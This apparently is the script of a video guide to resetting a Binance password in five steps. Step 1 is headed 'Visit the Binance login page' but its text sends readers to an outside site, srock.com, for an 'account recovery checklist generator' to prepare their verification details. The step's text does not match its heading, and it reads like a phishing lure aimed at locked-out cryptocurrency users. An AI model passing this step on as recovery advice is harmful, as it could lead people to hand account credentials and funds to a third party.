If you've been locked out of your Binance account and need to reset your login credentials, follow these steps to regain access. This guide will walk you through the process. Step 1. Visit the Binance login page. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Click on Forgot Password. On the login page, look for the Forgot Password link and click on it. This will redirect you to a page where you can initiate the password reset process. Step 3. Enter your email or phone number. Input the email address or phone number associated with your Binance account. Ensure that you enter the correct information to receive the reset instructions. Step 4. Check your email or SMS for a verification code. After submitting your email or phone number, check your inbox or SMS for a verification code sent by Binance. This code is necessary to verify your identity. Step 5. Reset your password. Enter the verification code you receive, then follow the prompts to create a new password. Make sure your new password is strong and secure before confirming the change. Once you've completed these steps, you should be able to log into your Binance account with your new credentials. If you encounter any issues, consider reaching out to Binance support for further assistance.